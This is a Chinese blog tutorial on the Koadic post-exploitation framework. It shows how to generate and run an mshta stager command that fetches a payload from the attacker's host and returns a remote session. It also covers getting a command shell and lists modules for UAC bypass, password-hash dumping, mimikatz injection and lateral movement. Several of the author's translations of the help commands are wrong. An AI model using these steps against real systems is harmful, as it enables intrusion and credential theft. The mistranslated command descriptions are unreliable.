带你了解后渗透工具Koadic
前言:
在朋友的博客上看到推荐的一款工具Koadic,我接触了以后发现很不错这款工具的强大之处我觉得就是拿到shell后的各种模块功能,我就自己写出来发给大家看看吧。
首先把项目克隆到本地:
然后解压,如果你要安装到你指定的目录就先cd到那个目录在下载,我是复制到那了,所以我解压。如下图
运行koadic
cd koadic-master/ //cd到软件目录
sudo ./koadic //用最高权限运行koadic
打开Koadic,显示需要设置的内容
下图命令如下
(koadic: sta/js/mshta)# info //
查看需要设置的内容
查看工具使用帮助
(koadic: sta/js/mshta)# help
大佬跳过我的翻译,英语很渣而且是全靠感觉翻译的(很辛苦,靠经验和百度翻译蒙)
(koadic: sta/js/mshta)# help //帮助的意思
COMMAND DESCRIPTION 命令 描述
——— ————-
load reloads all modules //显示
info shows the current module options//显示当前模块选项。
use switch to a different module//切换到不同的模块
set sets a variable for the current module//为当前模块设置一个变量
jobs shows info about jobs//显示有关工作的信息
help displays help info for a command//获取一个cmdshell
cmdshell command shell to interact with a zombie// 命令 shell 与僵尸交互
kill shows info about jobs//显示有关工作的信息
listeners shows info about stagers//显示信息的传输器载荷
exit exits the program//退出
zombies lists hooked targets//显示所有僵尸会话
run runs the current module//运行,和exploit一个样
verbose exits the program//退出程序
进入主题 ,开始设置。听着是不是热血沸腾要往下看了,哈哈。其实没啥要讲的,你只需要set lhost
这个命令大家应该都懂得,就是设置本地ip。
如下图
注意看,他生成了一个网址,
其实这是一个恶意网址,里面装载了exploit
最后生成的利用命令如下
mshta http://192.168.0.105:9999/S8QoC
利用方法是放到cmd里面执行
如下图
其实你可以看到他弹出了事件查看器我也不知道为什么,不是我点开的啊,
也可能会好奇mshta是什么意思,正解如下
mshta.exe是微软Windows操作系统相关程序,用于执行.HTA文件
我想就是这样利用的吧
那么当目标主机运行这个命令的时候,我们这边就反弹回来了会话 会话ID为0
如下图
如果是用其他复制批量执行了这个命令,会话比较多的话可以执行zombies来查看左右会话,并选择id进行控制
然后如果我这里想获取一个cmdshell的话,方法如下
cmdshell ID
我这里应该是 cmdshell 0
如下图
当然这怎么能算得上好用的后渗透呢,这怎么能满足大家呢
当然了,上面只是普通操作,普通操作,所谓后渗透,在下面,
慢慢看嘛,这个后渗透工具值得上榜的原因我认为有几条
1.环境要求不高
2.操作很简单
3.提供的后渗透模块很实用丰富
后渗透模块我就不一个一个讲了,设置都很简单
我主要给你们说一下名字
- Hooks a zombie
- Elevates integrity (UAC Bypass)
- Dumps SAM/SECURITY hive for passwords
- Scans local network for open SMB
- Pivots to another machine
Stagers(传输器载荷)
Stagers hook target zombies and allow you to use implants.
传输器载荷可以 hook 目标僵尸,进而方便使用植入。
Module | Description |
---|---|
stager/js/mshta | 可以使用HTML的应用程序在内存中的有效载荷mshta.exe |
stager/js/regsvr | 可以使用regsvr32.exe COM+脚本内存负载 |
stager/js/rundll32_js | serves payloads in memory using rundll32.exe 可以使用rundll32.exe内存负载 |
stager/js/disk | serves payloads using files on disk 使用磁盘上的文件提供有效载荷 |
Implants(
Implants start jobs on zombies.
Implants 在僵尸上运行。
Module | Description |
---|---|
implant/elevate/bypassuac_eventvwr | Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.使用enigma0x3的eventvwr.exe漏洞绕过UAC的Windows 7, 8,和10。 |
implant/elevate/bypassuac_sdclt | Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10.使用enigma0x3的sdclt.exe漏洞绕过UAC的Windows 10。 |
implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window.长量和隐藏的窗口打开小红莓YouTube。 |
implant/fun/voice | Plays a message over text-to-speech.在文本到语音之间传递信息。 |
implant/gather/clipboard | Retrieves the current content of the user clipboard.检索用户剪贴板的当前内容。 |
implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive.从SAM hive检索密码。 |
implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file.域控制器hashes从NTDS。说文件。 |
implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).注入一个反射加载的DLL来运行powerkatz。dll(使用动态包装器X)。 |
implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).注入一个反射加载的DLL来运行powerkatz。dll(@tirannido DotNetToJS)。 |
implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed).运行任意的shell代码有效负载(如果已经安装了Excel)。 |
implant/manage/enable_rdesktop | Enables remote desktop on the target.在目标上启用远程桌面。 |
implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output.在目标上运行任意命令,并可选地接收输出。 |
implant/pivot/stage_wmi | Hook a zombie on another machine using WMI.用WMI把僵尸挂在另一台机器上。 |
implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals.使用sysinternals中的psexec在另一台机器上运行一个命令。 |
implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN.使用HTTP扫描目标僵尸网络上的TCP端口。 |
implant/utils/download_file | Downloads a file from the target zombie.从目标僵尸下载一个文件 |
implant/utils/upload_file | Uploads a file from the listening server to the target zombies.上传一个从监听服务器到目标僵尸的文件 |
Disclaimer 声明
代码示例仅供教育参考,因为只有研究攻击者使用的攻击手段,才能建立足够强大的防御体系。 在未经事先许可的情况下使用此代码对目标系统进行操作是非法的,作者对此不负任何责任。
编辑:Pingx
有不好的地方请指出
带你了解后渗透工具Koadic的更多相关文章
- 有趣的后渗透工具 Koadic
koadic是DEFCON黑客大会上分享出来的的一个后渗透工具,虽然和msf有些相似,但是Koadic主要是通过使用Windows ScriptHost(也称为JScript / VBScript)进 ...
- 后渗透工具Empire使用教程
一.前言 Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学.安全通信和灵活的架构之上.Empire实现了无需powershell.exe就可运 ...
- 渗透攻防工具篇-后渗透阶段的Meterpreter
作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit ...
- 后渗透提权辅助工具BeRoot详解
0x00 工具介绍 前言 BeRoot是一个后期开发工具,用于检查常见的Windows的配置错误,以方便找到提高我们提权的方法.其二进制编译地址为: https://github.com/Alessa ...
- iOS macOS的后渗透利用工具:EggShell
EggShell是一款基于Python编写的iOS和macOS的后渗透利用工具.它有点类似于metasploit,我们可以用它来创建payload建立侦听.此外,在反弹回的session会话也为我们提 ...
- Enumy:一款功能强大的Linux后渗透提权枚举工具
Enumy是一款功能强大的Linux后渗透提权枚举工具,该工具是一个速度非常快的可移植可执行文件,广大研究人员可以在针对Linux设备的渗透测试以及CTF的后渗透阶段利用该工具实现权限提升,而Enum ...
- Metasploit简单使用——后渗透阶段
在上文中我们复现了永恒之蓝漏洞,这里我们学习一下利用msf简单的后渗透阶段的知识/ 一.meterperter常用命令 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详 ...
- Metasploit Framework(8)后渗透测试(一)
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器IP:192.168.163. ...
- 攻击者利用的Windows命令、横向渗透工具分析结果列表
横向渗透工具分析结果列表 https://jpcertcc.github.io/ToolAnalysisResultSheet/ 攻击者利用的Windows命令 https://blogs.jpcer ...
随机推荐
- 写作环境搭建(git+github+markdown+jekyll)
转载自: https://site.douban.com/196781/widget/notes/12161495/note/264946576/ 2013-03-04 19:33:10 --- ...
- 1、MyBatis框架底层初涉
1.拜年 哈哈,现在是过年了,祝大家新年好. 本来大过年的是不打算碰电脑的,(抢票除外,三疯同学现在还没抢到票,然后突然又延长假期了).现在疫情严重,被堵家里不能出去了.不能为国家做贡献,但是起码不能 ...
- python opencv:像素操作
图片的像素 像素:组成图片的单位 RGB:颜色由 RGB三种颜色组成 颜色深度:对于8bit的颜色深度来说,它可以表示的颜色范围是 0 ~ 255,对于RGB图片来说,8位颜色深度可以表示 (2^8) ...
- C#多个泛型约束问题
多个约束之间使用逗号隔开,但不重复T约束. 1. private void AddControl<T>(TabPage tabPage, T userControl) where T: U ...
- 单播反向路径转发uRPF
uRPF将数据包的源地址和存储在转发信息库(FIB)中的信息进行对照,以判定数据包的合法性.FIB是Cisco CEF技术中的一张表,包含从路由表中复制过来的转发信息,可以将其视为路由表的镜像,FIB ...
- MySQL优化2.索引
什么是索引: 索引的作用相当于图书的目录,可以根据目录中的页码快速找到所需的内容. 建立索引合适的列 经常用作where条件的列,order by排序的列 数据列不重复而且并不是唯一的几个值 不被经常 ...
- 开源代码License
参考:https://mp.weixin.qq.com/s/Q29NGDIbyCwm6KiAKqI46A
- Python读取MNIST数据集
MNIST数据集获取 MNIST数据集是入门机器学习/模式识别的最经典数据集之一.最早于1998年Yan Lecun在论文: Gradient-based learning applied to do ...
- 「JLOI2014」松鼠的新家
「JLOI2014」松鼠的新家 传送门 两种做法: 树上差分 \(O(n)\) 树链剖分 \(O(nlogn)\) 树剖比较好写而且无脑,树上差分复杂度优秀一些但是会有点难调. 这里给出树剖写法: 唯 ...
- slice 、 substr 、replace
slice( 参数1 [,参数2] ) (注意不要让[参数1]下标越过[参数2]下标,否则会得到空字符串,且[参数2]是不包含在截取范围内的) 参数1:截取字符的[起始下标]. 值为正 ...